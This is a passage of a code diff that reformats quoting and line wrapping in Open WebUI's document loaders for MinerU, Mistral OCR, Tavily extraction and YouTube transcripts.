!= 0: raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail=f"MinerU Cloud API error: {result.get('msg', 'Unknown error')}", + detail=f'MinerU Cloud API error: {result.get("msg", "Unknown error")}', ) - data = result.get("data", {}) - extract_result = data.get("extract_result", []) + data = result.get('data', {}) + extract_result = data.get('extract_result', []) # Find our file in the batch results file_result = None for item in extract_result: - if item.get("file_name") == filename: + if item.get('file_name') == filename: file_result = item break if not file_result: raise HTTPException( status.HTTP_502_BAD_GATEWAY, - detail=f"File {filename} not found in batch results", + detail=f'File {filename} not found in batch results', ) - state = file_result.get("state") + state = file_result.get('state') - if state == "done": - log.info(f"Processing complete for {filename}") + if state == 'done': + log.info(f'Processing complete for {filename}') return file_result - elif state == "failed": - error_msg = file_result.get("err_msg", "Unknown error") + elif state == 'failed': + error_msg = file_result.get('err_msg', 'Unknown error') raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail=f"MinerU processing failed: {error_msg}", + detail=f'MinerU processing failed: {error_msg}', ) - elif state in ["waiting-file", "pending", "running", "converting"]: + elif state in ['waiting-file', 'pending', 'running', 'converting']: # Still processing if iteration % 10 == 0: # Log every 20 seconds - log.info( - f"Processing status: {state} (iteration {iteration + 1}/{max_iterations})" - ) + log.info(f'Processing status: {state} (iteration {iteration + 1}/{max_iterations})') time.sleep(poll_interval) else: - log.warning(f"Unknown state: {state}") + log.warning(f'Unknown state: {state}') time.sleep(poll_interval) # Timeout raise HTTPException( status.HTTP_504_GATEWAY_TIMEOUT, - detail="MinerU processing timed out after 10 minutes", + detail='MinerU processing timed out after 10 minutes', ) def _download_and_extract_zip(self, zip_url: str, filename: str) -> str: """ Download ZIP file from CDN and extract markdown content. Returns the markdown content as a string. """ - log.info(f"Downloading results from: {zip_url}") + log.info(f'Downloading results from: {zip_url}') try: response = requests.get(zip_url, timeout=60) response.raise_for_status() except requests.HTTPError as e: raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail=f"Failed to download results ZIP: {e}", + detail=f'Failed to download results ZIP: {e}', ) except Exception as e: raise HTTPException( status.HTTP_500_INTERNAL_SERVER_ERROR, - detail=f"Error downloading results: {str(e)}", + detail=f'Error downloading results: {str(e)}', ) # Save ZIP to temporary file and extract try: - with tempfile.NamedTemporaryFile(delete=False, suffix=".zip") as tmp_zip: + with tempfile.NamedTemporaryFile(delete=False, suffix='.zip') as tmp_zip: tmp_zip.write(response.content) tmp_zip_path = tmp_zip.name with tempfile.TemporaryDirectory() as tmp_dir: # Extract ZIP - with zipfile.ZipFile(tmp_zip_path, "r") as zip_ref: + with zipfile.ZipFile(tmp_zip_path, 'r') as zip_ref: zip_ref.extractall(tmp_dir) # Find markdown file - search recursively for any .md file @@ -466,33 +456,27 @@ def _download_and_extract_zip(self, zip_url: str, filename: str) -> str: full_path = os.path.join(root, file) all_files.append(full_path) # Look for any .md file - if file.endswith(".md"): + if file.endswith('.md'): found_md_path = full_path - log.info(f"Found markdown file at: {full_path}") + log.info(f'Found markdown file at: {full_path}') try: - with open(full_path, "r", encoding="utf-8") as f: + with open(full_path, 'r', encoding='utf-8') as f: markdown_content = f.read() - if ( - markdown_content - ): # Use the first non-empty markdown file + if markdown_content: # Use the first non-empty markdown file break except Exception as e: - log.warning(f"Failed to read {full_path}: {e}") + log.warning(f'Failed to read {full_path}: {e}') if markdown_content: break if markdown_content is None: - log.error(f"Available files in ZIP: {all_files}") + log.error(f'Available files in ZIP: {all_files}') # Try to provide more helpful error message - md_files = [f for f in all_files if f.endswith(".md")] + md_files = [f for f in all_files if f.endswith('.md')] if md_files: - error_msg = ( - f"Found .md files but couldn't read them: {md_files}" - ) + error_msg = f"Found .md files but couldn't read them: {md_files}" else: - error_msg = ( - f"No .md files found in ZIP. Available files: {all_files}" - ) + error_msg = f'No .md files found in ZIP. Available files: {all_files}' raise HTTPException( status.HTTP_502_BAD_GATEWAY, detail=error_msg, @@ -504,21 +488,19 @@ def _download_and_extract_zip(self, zip_url: str, filename: str) -> str: except zipfile.BadZipFile as e: raise HTTPException( status.HTTP_502_BAD_GATEWAY, - detail=f"Invalid ZIP file received: {e}", + detail=f'Invalid ZIP file received: {e}', ) except Exception as e: raise HTTPException( status.HTTP_500_INTERNAL_SERVER_ERROR, - detail=f"Error extracting ZIP: {str(e)}", + detail=f'Error extracting ZIP: {str(e)}', ) if not markdown_content: raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail="Extracted markdown content is empty", + detail='Extracted markdown content is empty', ) - log.info( - f"Successfully extracted markdown content ({len(markdown_content)} characters)" - ) + log.info(f'Successfully extracted markdown content ({len(markdown_content)} characters)') return markdown_content
backend/open_webui/retrieval/loaders/mistral.py+139 −191 modified@@ -49,13 +49,11 @@ def __init__( enable_debug_logging: Enable detailed debug logs. """ if not api_key: - raise ValueError("API key cannot be empty.") + raise ValueError('API key cannot be empty.') if not os.path.exists(file_path): - raise FileNotFoundError(f"File not found at {file_path}") + raise FileNotFoundError(f'File not found at {file_path}') - self.base_url = ( - base_url.rstrip("/") if base_url else "https://api.mistral.ai/v1" - ) + self.base_url = base_url.rstrip('/') if base_url else 'https://api.mistral.ai/v1' self.api_key = api_key self.file_path = file_path self.timeout = timeout @@ -65,18 +63,10 @@ def __init__( # PERFORMANCE OPTIMIZATION: Differentiated timeouts for different operations # This prevents long-running OCR operations from affecting quick operations # and improves user experience by failing fast on operations that should be quick - self.upload_timeout = min( - timeout, 120 - ) # Cap upload at 2 minutes - prevents hanging on large files - self.url_timeout = ( - 30 # URL requests should be fast - fail quickly if API is slow - ) - self.ocr_timeout = ( - timeout # OCR can take the full timeout - this is the heavy operation - ) - self.cleanup_timeout = ( - 30 # Cleanup should be quick - don't hang on file deletion - ) + self.upload_timeout = min(timeout, 120) # Cap upload at 2 minutes - prevents hanging on large files + self.url_timeout = 30 # URL requests should be fast - fail quickly if API is slow + self.ocr_timeout = timeout # OCR can take the full timeout - this is the heavy operation + self.cleanup_timeout = 30 # Cleanup should be quick - don't hang on file deletion # PERFORMANCE OPTIMIZATION: Pre-compute file info to avoid repeated filesystem calls # This avoids multiple os.path.basename() and os.path.getsize() calls during processing @@ -85,8 +75,8 @@ def __init__( # ENHANCEMENT: Added User-Agent for better API tracking and debugging self.headers = { - "Authorization": f"Bearer {self.api_key}", - "User-Agent": "OpenWebUI-MistralLoader/2.0", # Helps API provider track usage + 'Authorization': f'Bearer {self.api_key}', + 'User-Agent': 'OpenWebUI-MistralLoader/2.0', # Helps API provider track usage } def _debug_log(self, message: str, *args) -> None: @@ -108,43 +98,39 @@ def _handle_response(self, response: requests.Response) -> Dict[str, Any]: return {} # Return empty dict if no content return response.json() except requests.exceptions.HTTPError as http_err: - log.error(f"HTTP error occurred: {http_err} - Response: {response.text}") + log.error(f'HTTP error occurred: {http_err} - Response: {response.text}') raise except requests.exceptions.RequestException as req_err: - log.error(f"Request exception occurred: {req_err}") + log.error(f'Request exception occurred: {req_err}') raise except ValueError as json_err: # Includes JSONDecodeError - log.error(f"JSON decode error: {json_err} - Response: {response.text}") + log.error(f'JSON decode error: {json_err} - Response: {response.text}') raise # Re-raise after logging - async def _handle_response_async( - self, response: aiohttp.ClientResponse - ) -> Dict[str, Any]: + async def _handle_response_async(self, response: aiohttp.ClientResponse) -> Dict[str, Any]: """Async version of response handling with better error info.""" try: response.raise_for_status() # Check content type - content_type = response.headers.get("content-type", "") - if "application/json" not in content_type: + content_type = response.headers.get('content-type', '') + if 'application/json' not in content_type: if response.status == 204: return {} text = await response.text() - raise ValueError( - f"Unexpected content type: {content_type}, body: {text[:200]}..." - ) + raise ValueError(f'Unexpected content type: {content_type}, body: {text[:200]}...') return await response.json() except aiohttp.ClientResponseError as e: - error_text = await response.text() if response else "No response" - log.error(f"HTTP {e.status}: {e.message} - Response: {error_text[:500]}") + error_text = await response.text() if response else 'No response' + log.error(f'HTTP {e.status}: {e.message} - Response: {error_text[:500]}') raise except aiohttp.ClientError as e: - log.error(f"Client error: {e}") + log.error(f'Client error: {e}') raise except Exception as e: - log.error(f"Unexpected error processing response: {e}") + log.error(f'Unexpected error processing response: {e}') raise def _is_retryable_error(self, error: Exception) -> bool: @@ -172,13 +158,11 @@ def _is_retryable_error(self, error: Exception) -> bool: return True # Timeouts might resolve on retry if isinstance(error, requests.exceptions.HTTPError): # Only retry on server errors (5xx) or rate limits (429) - if hasattr(error, "response") and error.response is not None: + if hasattr(error, 'response') and error.response is not None: status_code = error.response.status_code return status_code >= 500 or status_code == 429 return False - if isinstance( - error, (aiohttp.ClientConnectionError, aiohttp.ServerTimeoutError) - ): + if isinstance(error, (aiohttp.ClientConnectionError, aiohttp.ServerTimeoutError)): return True # Async network/timeout errors are retryable if isinstance(error, aiohttp.ClientResponseError): return error.status >= 500 or error.status == 429 @@ -204,8 +188,7 @@ def _retry_request_sync(self, request_func, *args, **kwargs): # Prevents overwhelming the server while ensuring reasonable retry delays wait_time = min((2**attempt) + 0.5, 30) # Cap at 30 seconds log.warning( - f"Retryable error (attempt {attempt + 1}/{self.max_retries}): {e}. " - f"Retrying in {wait_time}s..." + f'Retryable error (attempt {attempt + 1}/{self.max_retries}): {e}. Retrying in {wait_time}s...' ) time.sleep(wait_time) @@ -226,8 +209,7 @@ async def _retry_request_async(self, request_func, *args, **kwargs): # PERFORMANCE OPTIMIZATION: Non-blocking exponential backoff wait_time = min((2**attempt) + 0.5, 30) # Cap at 30 seconds log.warning( - f"Retryable error (attempt {attempt + 1}/{self.max_retries}): {e}. " - f"Retrying in {wait_time}s..." + f'Retryable error (attempt {attempt + 1}/{self.max_retries}): {e}. Retrying in {wait_time}s...' ) await asyncio.sleep(wait_time) # Non-blocking wait @@ -240,15 +222,15 @@ def _upload_file(self) -> str: Although streaming is not enabled for this endpoint, the file is opened in a context manager to minimize memory usage duration. """ - log.info("Uploading file to Mistral API") - url = f"{self.base_url}/files" + log.info('Uploading file to Mistral API') + url = f'{self.base_url}/files' def upload_request(): # MEMORY OPTIMIZATION: Use context manager to minimize file handle lifetime # This ensures the file is closed immediately after reading, reducing memory usage - with open(self.file_path, "rb") as f: - files = {"file": (self.file_name, f, "application/pdf")} - data = {"purpose": "ocr"} + with open(self.file_path, 'rb') as f: + files = {'file': (self.file_name, f, 'application/pdf')} + data = {'purpose': 'ocr'} # NOTE: stream=False is required for this endpoint # The Mistral API doesn't support chunked uploads for this endpoint @@ -265,42 +247,38 @@ def upload_request(): try: response_data = self._retry_request_sync(upload_request) - file_id = response_data.get("id") + file_id = response_data.get('id') if not file_id: - raise ValueError("File ID not found in upload response.") - log.info(f"File uploaded successfully. File ID: {file_id}") + raise ValueError('File ID not found in upload response.') + log.info(f'File uploaded successfully. File ID: {file_id}') return file_id except Exception as e: - log.error(f"Failed to upload file: {e}") + log.error(f'Failed to upload file: {e}') raise async def _upload_file_async(self, session: aiohttp.ClientSession) -> str: """Async file upload with streaming for better memory efficiency.""" - url = f"{self.base_url}/files" + url = f'{self.base_url}/files' async def upload_request(): # Create multipart writer for streaming upload - writer = aiohttp.MultipartWriter("form-data") + writer = aiohttp.MultipartWriter('form-data') # Add purpose field - purpose_part = writer.append("ocr") - purpose_part.set_content_disposition("form-data", name="purpose") + purpose_part = writer.append('ocr') + purpose_part.set_content_disposition('form-data', name='purpose') # Add file part with streaming file_part = writer.append_payload( aiohttp.streams.FilePayload( self.file_path, filename=self.file_name, - content_type="application/pdf", + content_type='application/pdf', ) ) - file_part.set_content_disposition( - "form-data", name="file", filename=self.file_name - ) + file_part.set_content_disposition('form-data', name='file', filename=self.file_name) - self._debug_log( - f"Uploading file: {self.file_name} ({self.file_size:,} bytes)" - ) + self._debug_log(f'Uploading file: {self.file_name} ({self.file_size:,} bytes)') async with session.post( url, @@ -312,48 +290,44 @@ async def upload_request(): response_data = await self._retry_request_async(upload_request) - file_id = response_data.get("id") + file_id = response_data.get('id') if not file_id: - raise ValueError("File ID not found in upload response.") + raise ValueError('File ID not found in upload response.') - log.info(f"File uploaded successfully. File ID: {file_id}") + log.info(f'File uploaded successfully. File ID: {file_id}') return file_id def _get_signed_url(self, file_id: str) -> str: """Retrieves a temporary signed URL for the uploaded file (sync version).""" - log.info(f"Getting signed URL for file ID: {file_id}") - url = f"{self.base_url}/files/{file_id}/url" - params = {"expiry": 1} - signed_url_headers = {**self.headers, "Accept": "application/json"} + log.info(f'Getting signed URL for file ID: {file_id}') + url = f'{self.base_url}/files/{file_id}/url' + params = {'expiry': 1} + signed_url_headers = {**self.headers, 'Accept': 'application/json'} def url_request(): - response = requests.get( - url, headers=signed_url_headers, params=params, timeout=self.url_timeout - ) + response = requests.get(url, headers=signed_url_headers, params=params, timeout=self.url_timeout) return self._handle_response(response) try: response_data = self._retry_request_sync(url_request) - signed_url = response_data.get("url") + signed_url = response_data.get('url') if not signed_url: - raise ValueError("Signed URL not found in response.") - log.info("Signed URL received.") + raise ValueError('Signed URL not found in response.') + log.info('Signed URL received.') return signed_url except Exception as e: - log.error(f"Failed to get signed URL: {e}") + log.error(f'Failed to get signed URL: {e}') raise - async def _get_signed_url_async( - self, session: aiohttp.ClientSession, file_id: str - ) -> str: + async def _get_signed_url_async(self, session: aiohttp.ClientSession, file_id: str) -> str: """Async signed URL retrieval.""" - url = f"{self.base_url}/files/{file_id}/url" - params = {"expiry": 1} + url = f'{self.base_url}/files/{file_id}/url' + params = {'expiry': 1} - headers = {**self.headers, "Accept": "application/json"} + headers = {**self.headers, 'Accept': 'application/json'} async def url_request(): - self._debug_log(f"Getting signed URL for file ID: {file_id}") + self._debug_log(f'Getting signed URL for file ID: {file_id}') async with session.get( url, headers=headers, @@ -364,69 +338,65 @@ async def url_request(): response_data = await self._retry_request_async(url_request) - signed_url = response_data.get("url") + signed_url = response_data.get('url') if not signed_url: - raise ValueError("Signed URL not found in response.") + raise ValueError('Signed URL not found in response.') - self._debug_log("Signed URL received successfully") + self._debug_log('Signed URL received successfully') return signed_url def _process_ocr(self, signed_url: str) -> Dict[str, Any]: """Sends the signed URL to the OCR endpoint for processing (sync version).""" - log.info("Processing OCR via Mistral API") - url = f"{self.base_url}/ocr" + log.info('Processing OCR via Mistral API') + url = f'{self.base_url}/ocr' ocr_headers = { **self.headers, - "Content-Type": "application/json", - "Accept": "application/json", + 'Content-Type': 'application/json', + 'Accept': 'application/json', } payload = { - "model": "mistral-ocr-latest", - "document": { - "type": "document_url", - "document_url": signed_url, + 'model': 'mistral-ocr-latest', + 'document': { + 'type': 'document_url', + 'document_url': signed_url, }, - "include_image_base64": False, + 'include_image_base64': False, } def ocr_request(): - response = requests.post( - url, headers=ocr_headers, json=payload, timeout=self.ocr_timeout - ) + response = requests.post(url, headers=ocr_headers, json=payload, timeout=self.ocr_timeout) return self._handle_response(response) try: ocr_response = self._retry_request_sync(ocr_request) - log.info("OCR processing done.") - self._debug_log("OCR response: %s", ocr_response) + log.info('OCR processing done.') + self._debug_log('OCR response: %s', ocr_response) return ocr_response except Exception as e: - log.error(f"Failed during OCR processing: {e}") + log.error(f'Failed during OCR processing: {e}') raise - async def _process_ocr_async( - self, session: aiohttp.ClientSession, signed_url: str - ) -> Dict[str, Any]: + async def _process_ocr_async(self, session: aiohttp.ClientSession, signed_url: str) -> Dict[str, Any]: """Async OCR processing with timing metrics.""" - url = f"{self.base_url}/ocr" + url = f'{self.base_url}/ocr' headers = { **self.headers, - "Content-Type": "application/json", - "Accept": "application/json", + 'Content-Type': 'application/json', + 'Accept': 'application/json', } payload = { - "model": "mistral-ocr-latest", - "document": { - "type": "document_url", - "document_url": signed_url, + 'model': 'mistral-ocr-latest', + 'document': { + 'type': 'document_url', + 'document_url': signed_url, }, - "include_image_base64": False, + 'include_image_base64': False, } async def ocr_request(): - log.info("Starting OCR processing via Mistral API") + log.info('Starting OCR processing via Mistral API') start_time = time.time() async with session.post( @@ -438,50 +408,44 @@ async def ocr_request(): ocr_response = await self._handle_response_async(response) processing_time = time.time() - start_time - log.info(f"OCR processing completed in {processing_time:.2f}s") + log.info(f'OCR processing completed in {processing_time:.2f}s') return ocr_response return await self._retry_request_async(ocr_request) def _delete_file(self, file_id: str) -> None: """Deletes the file from Mistral storage (sync version).""" - log.info(f"Deleting uploaded file ID: {file_id}") - url = f"{self.base_url}/files/{file_id}" + log.info(f'Deleting uploaded file ID: {file_id}') + url = f'{self.base_url}/files/{file_id}' try: - response = requests.delete( - url, headers=self.headers, timeout=self.cleanup_timeout - ) + response = requests.delete(url, headers=self.headers, timeout=self.cleanup_timeout) delete_response = self._handle_response(response) - log.info(f"File deleted successfully: {delete_response}") + log.info(f'File deleted successfully: {delete_response}') except Exception as e: # Log error but don't necessarily halt execution if deletion fails - log.error(f"Failed to delete file ID {file_id}: {e}") + log.error(f'Failed to delete file ID {file_id}: {e}') - async def _delete_file_async( - self, session: aiohttp.ClientSession, file_id: str - ) -> None: + async def _delete_file_async(self, session: aiohttp.ClientSession, file_id: str) -> None: """Async file deletion with error tolerance.""" try: async def delete_request(): - self._debug_log(f"Deleting file ID: {file_id}") + self._debug_log(f'Deleting file ID: {file_id}') async with session.delete( - url=f"{self.base_url}/files/{file_id}", + url=f'{self.base_url}/files/{file_id}', headers=self.headers, - timeout=aiohttp.ClientTimeout( - total=self.cleanup_timeout - ), # Shorter timeout for cleanup + timeout=aiohttp.ClientTimeout(total=self.cleanup_timeout), # Shorter timeout for cleanup ) as response: return await self._handle_response_async(response) await self._retry_request_async(delete_request) - self._debug_log(f"File {file_id} deleted successfully") + self._debug_log(f'File {file_id} deleted successfully') except Exception as e: # Don't fail the entire process if cleanup fails - log.warning(f"Failed to delete file ID {file_id}: {e}") + log.warning(f'Failed to delete file ID {file_id}: {e}') @asynccontextmanager async def _get_session(self): @@ -506,21 +470,21 @@ async def _get_session(self): async with aiohttp.ClientSession( connector=connector, timeout=timeout, - headers={"User-Agent": "OpenWebUI-MistralLoader/2.0"}, + headers={'User-Agent': 'OpenWebUI-MistralLoader/2.0'}, raise_for_status=False, # We handle status codes manually trust_env=True, ) as session: yield session def _process_results(self, ocr_response: Dict[str, Any]) -> List[Document]: """Process OCR results into Document objects with enhanced metadata and memory efficiency.""" - pages_data = ocr_response.get("pages") + pages_data = ocr_response.get('pages') if not pages_data: - log.warning("No pages found in OCR response.") + log.warning('No pages found in OCR response.') return [ Document( - page_content="No text content found", - metadata={"error": "no_pages", "file_name": self.file_name}, + page_content='No text content found', + metadata={'error': 'no_pages', 'file_name': self.file_name}, ) ] @@ -530,8 +494,8 @@ def _process_results(self, ocr_response: Dict[str, Any]) -> List[Document]: # Process pages in a memory-efficient way for page_data in pages_data: - page_content = page_data.get("markdown") - page_index = page_data.get("index") # API uses 0-based index + page_content = page_data.get('markdown') + page_index = page_data.get('index') # API uses 0-based index if page_content is None or page_index is None: skipped_pages += 1 @@ -548,42 +512,38 @@ def _process_results(self, ocr_response: Dict[str, Any]) -> List[Document]: if not cleaned_content: skipped_pages += 1 - self._debug_log(f"Skipping empty page {page_index}") + self._debug_log(f'Skipping empty page {page_index}') continue # Create document with optimized metadata documents.append( Document( page_content=cleaned_content, metadata={ - "page": page_index, # 0-based index from API - "page_label": page_index + 1, # 1-based label for convenience - "total_pages": total_pages, - "file_name": self.file_name, - "file_size": self.file_size, - "processing_engine": "mistral-ocr", - "content_length": len(cleaned_content), + 'page': page_index, # 0-based index from API + 'page_label': page_index + 1, # 1-based label for convenience + 'total_pages': total_pages, + 'file_name': self.file_name, + 'file_size': self.file_size, + 'processing_engine': 'mistral-ocr', + 'content_length': len(cleaned_content), }, ) ) if skipped_pages > 0: - log.info( - f"Processed {len(documents)} pages, skipped {skipped_pages} empty/invalid pages" - ) + log.info(f'Processed {len(documents)} pages, skipped {skipped_pages} empty/invalid pages') if not documents: # Case where pages existed but none had valid markdown/index - log.warning( - "OCR response contained pages, but none had valid content/index." - ) + log.warning('OCR response contained pages, but none had valid content/index.') return [ Document( - page_content="No valid text content found in document", + page_content='No valid text content found in document', metadata={ - "error": "no_valid_pages", - "total_pages": total_pages, - "file_name": self.file_name, + 'error': 'no_valid_pages', + 'total_pages': total_pages, + 'file_name': self.file_name, }, ) ] @@ -615,24 +575,20 @@ def load(self) -> List[Document]: documents = self._process_results(ocr_response) total_time = time.time() - start_time - log.info( - f"Sync OCR workflow completed in {total_time:.2f}s, produced {len(documents)} documents" - ) + log.info(f'Sync OCR workflow completed in {total_time:.2f}s, produced {len(documents)} documents') return documents except Exception as e: total_time = time.time() - start_time - log.error( - f"An error occurred during the loading process after {total_time:.2f}s: {e}" - ) + log.error(f'An error occurred during the loading process after {total_time:.2f}s: {e}') # Return an error document on failure return [ Document( - page_content=f"Error during processing: {e}", + page_content=f'Error during processing: {e}', metadata={ - "error": "processing_failed", - "file_name": self.file_name, + 'error': 'processing_failed', + 'file_name': self.file_name, }, ) ] @@ -643,9 +599,7 @@ def load(self) -> List[Document]: self._delete_file(file_id) except Exception as del_e: # Log deletion error, but don't overwrite original error if one occurred - log.error( - f"Cleanup error: Could not delete file ID {file_id}. Reason: {del_e}" - ) + log.error(f'Cleanup error: Could not delete file ID {file_id}. Reason: {del_e}') async def load_async(self) -> List[Document]: """ @@ -672,21 +626,19 @@ async def load_async(self) -> List[Document]: documents = self._process_results(ocr_response) total_time = time.time() - start_time - log.info( - f"Async OCR workflow completed in {total_time:.2f}s, produced {len(documents)} documents" - ) + log.info(f'Async OCR workflow completed in {total_time:.2f}s, produced {len(documents)} documents') return documents except Exception as e: total_time = time.time() - start_time - log.error(f"Async OCR workflow failed after {total_time:.2f}s: {e}") + log.error(f'Async OCR workflow failed after {total_time:.2f}s: {e}') return [ Document( - page_content=f"Error during OCR processing: {e}", + page_content=f'Error during OCR processing: {e}', metadata={ - "error": "processing_failed", - "file_name": self.file_name, + 'error': 'processing_failed', + 'file_name': self.file_name, }, ) ] @@ -697,11 +649,11 @@ async def load_async(self) -> List[Document]: async with self._get_session() as session: await self._delete_file_async(session, file_id) except Exception as cleanup_error: - log.error(f"Cleanup failed for file ID {file_id}: {cleanup_error}") + log.error(f'Cleanup failed for file ID {file_id}: {cleanup_error}') @staticmethod async def load_multiple_async( - loaders: List["MistralLoader"], + loaders: List['MistralLoader'], max_concurrent: int = 5, # Limit concurrent requests ) -> List[List[Document]]: """ @@ -717,15 +669,13 @@ async def load_multiple_async( if not loaders: return [] - log.info( - f"Starting concurrent processing of {len(loaders)} files with max {max_concurrent} concurrent" - ) + log.info(f'Starting concurrent processing of {len(loaders)} files with max {max_concurrent} concurrent') start_time = time.time() # Use semaphore to control concurrency semaphore = asyncio.Semaphore(max_concurrent) - async def process_with_semaphore(loader: "MistralLoader") -> List[Document]: + async def process_with_semaphore(loader: 'MistralLoader') -> List[Document]: async with semaphore: return await loader.load_async() @@ -737,14 +687,14 @@ async def process_with_semaphore(loader: "MistralLoader") -> List[Document]: processed_results = [] for i, result in enumerate(results): if isinstance(result, Exception): - log.error(f"File {i} failed: {result}") + log.error(f'File {i} failed: {result}') processed_results.append( [ Document( - page_content=f"Error processing file: {result}", + page_content=f'Error processing file: {result}', metadata={ - "error": "batch_processing_failed", - "file_index": i, + 'error': 'batch_processing_failed', + 'file_index': i, }, ) ] @@ -755,15 +705,13 @@ async def process_with_semaphore(loader: "MistralLoader") -> List[Document]: # MONITORING: Log comprehensive batch processing statistics total_time = time.time() - start_time total_docs = sum(len(docs) for docs in processed_results) - success_count = sum( - 1 for result in results if not isinstance(result, Exception) - ) + success_count = sum(1 for result in results if not isinstance(result, Exception)) failure_count = len(results) - success_count log.info( - f"Batch processing completed in {total_time:.2f}s: " - f"{success_count} files succeeded, {failure_count} files failed, " - f"produced {total_docs} total documents" + f'Batch processing completed in {total_time:.2f}s: ' + f'{success_count} files succeeded, {failure_count} files failed, ' + f'produced {total_docs} total documents' ) return processed_results
backend/open_webui/retrieval/loaders/tavily.py+16 −16 modified@@ -25,7 +25,7 @@ def __init__( self, urls: Union[str, List[str]], api_key: str, - extract_depth: Literal["basic", "advanced"] = "basic", + extract_depth: Literal['basic', 'advanced'] = 'basic', continue_on_failure: bool = True, ) -> None: """Initialize Tavily Extract client. @@ -42,13 +42,13 @@ def __init__( continue_on_failure: Whether to continue if extraction of a URL fails. """ if not urls: - raise ValueError("At least one URL must be provided.") + raise ValueError('At least one URL must be provided.') self.api_key = api_key self.urls = urls if isinstance(urls, list) else [urls] self.extract_depth = extract_depth self.continue_on_failure = continue_on_failure - self.api_url = "https://api.tavily.com/extract" + self.api_url = 'https://api.tavily.com/extract' def lazy_load(self) -> Iterator[Document]: """Extract and yield documents from the URLs using Tavily Extract API.""" @@ -57,35 +57,35 @@ def lazy_load(self) -> Iterator[Document]: batch_urls = self.urls[i : i + batch_size] try: headers = { - "Content-Type": "application/json", - "Authorization": f"Bearer {self.api_key}", + 'Content-Type': 'application/json', + 'Authorization': f'Bearer {self.api_key}', } # Use string for single URL, array for multiple URLs urls_param = batch_urls[0] if len(batch_urls) == 1 else batch_urls - payload = {"urls": urls_param, "extract_depth": self.extract_depth} + payload = {'urls': urls_param, 'extract_depth': self.extract_depth} # Make the API call response = requests.post(self.api_url, headers=headers, json=payload) response.raise_for_status() response_data = response.json() # Process successful results - for result in response_data.get("results", []): - url = result.get("url", "") - content = result.get("raw_content", "") + for result in response_data.get('results', []): + url = result.get('url', '') + content = result.get('raw_content', '') if not content: - log.warning(f"No content extracted from {url}") + log.warning(f'No content extracted from {url}') continue # Add URLs as metadata - metadata = {"source": url} + metadata = {'source': url} yield Document( page_content=content, metadata=metadata, ) - for failed in response_data.get("failed_results", []): - url = failed.get("url", "") - error = failed.get("error", "Unknown error") - log.error(f"Failed to extract content from {url}: {error}") + for failed in response_data.get('failed_results', []): + url = failed.get('url', '') + error = failed.get('error', 'Unknown error') + log.error(f'Failed to extract content from {url}: {error}') except Exception as e: if self.continue_on_failure: - log.error(f"Error extracting content from batch {batch_urls}: {e}") + log.error(f'Error extracting content from batch {batch_urls}: {e}') else: raise e
backend/open_webui/retrieval/loaders/youtube.py+26 −34 modified@@ -7,14 +7,14 @@ log = logging.getLogger(__name__) -ALLOWED_SCHEMES = {"http", "https"} +ALLOWED_SCHEMES = {'http', 'https'} ALLOWED_NETLOCS = { - "youtu.be", - "m.youtube.com", - "youtube.com", - "www.youtube.com", - "www.youtube-nocookie.com", - "vid.plus", + 'youtu.be', + 'm.youtube.com', + 'youtube.com', + 'www.youtube.com', + 'www.youtube-nocookie.com', + 'vid.plus', } @@ -30,17 +30,17 @@ def _parse_video_id(url: str) -> Optional[str]: path = parsed_url.path - if path.endswith("/watch"): + if path.endswith('/watch'): query = parsed_url.query parsed_query = parse_qs(query) - if "v" in parsed_query: - ids = parsed_query["v"] + if 'v' in parsed_query: + ids = parsed_query['v'] video_id = ids if isinstance(ids, str) else ids[0] else: return None else: - path = parsed_url.path.lstrip("/") - video_id = path.split("/")[-1] + path = parsed_url.path.lstrip('/') + video_id = path.split('/')[-1] if len(video_id) != 11: # Video IDs are 11 characters long return None @@ -54,13 +54,13 @@ class YoutubeLoader: def __init__( self, video_id: str, - language: Union[str, Sequence[str]] = "en", + language: Union[str, Sequence[str]] = 'en', proxy_url: Optional[str] = None, ): """Initialize with YouTube video ID.""" _video_id = _parse_video_id(video_id) self.video_id = _video_id if _video_id is not None else video_id - self._metadata = {"source": video_id} + self._metadata = {'source': video_id} self.proxy_url = proxy_url # Ensure language is a list @@ -70,8 +70,8 @@ def __init__( self.language = list(language) # Add English as fallback if not already in the list - if "en" not in self.language: - self.language.append("en") + if 'en' not in self.language: + self.language.append('en') def load(self) -> List[Document]: """Load YouTube transcripts into `Document` objects.""" @@ -85,22 +85,20 @@ def load(self) -> List[Document]: except ImportError: raise ImportError( 'Could not import "youtube_transcript_api" Python package. ' - "Please install it with `pip install youtube-transcript-api`." + 'Please install it with `pip install youtube-transcript-api`.' ) if self.proxy_url: - youtube_proxies = GenericProxyConfig( - http_url=self.proxy_url, https_url=self.proxy_url - ) - log.debug(f"Using proxy URL: {self.proxy_url[:14]}...") + youtube_proxies = GenericProxyConfig(http_url=self.proxy_url, https_url=self.proxy_url) + log.debug(f'Using proxy URL: {self.proxy_url[:14]}...') else: youtube_proxies = None transcript_api = YouTubeTranscriptApi(proxy_config=youtube_proxies) try: transcript_list = transcript_api.list(self.video_id) except Exception as e: - log.exception("Loading YouTube transcript failed") + log.exception('Loading YouTube transcript failed') return [] # Try each language in order of priority @@ -110,14 +108,10 @@ def load(self) -> List[Document]: if transcript.is_generated: log.debug(f"Found generated transcript for language '{lang}'") try: - transcript = transcript_list.find_manually_created_transcript( - [lang] - ) + transcript = transcript_list.find_manually_created_transcript([lang]) log.debug(f"Found manual transcript for language '{lang}'") except NoTranscriptFound: - log.debug( - f"No manual transcript found for language '{lang}', using generated" - ) + log.debug(f"No manual transcript found for language '{lang}', using generated") pass log.debug(f"Found transcript for language '{lang}'") @@ -131,12 +125,10 @@ def load(self) -> List[Document]: log.debug(f"Empty transcript for language '{lang}'") continue - transcript_text = " ".join( + transcript_text = ' '.join( map( lambda transcript_piece: ( - transcript_piece.text.strip(" ") - if hasattr(transcript_piece, "text") - else "" + transcript_piece.text.strip(' ') if hasattr(transcript_piece, 'text') else '' ), transcript_pieces, ) @@ -150,9 +142,9 @@ def load(self) -> List[Document]: raise e # If we get here, all languages failed - languages_tried = ", ".join(self.language) + languages_tried = ', '.join(self.language) log.warning( - f"No transcript found for any of the specified languages: {languages_tried}. Verify if the video has transcripts, add more languages if needed." + f'No transcript found for any of the specified languages: {languages_tried}. Verify if the video has transcripts, add more languages if needed.' ) raise NoTranscriptFound(self.video_id, self.language, list(transcript_list))
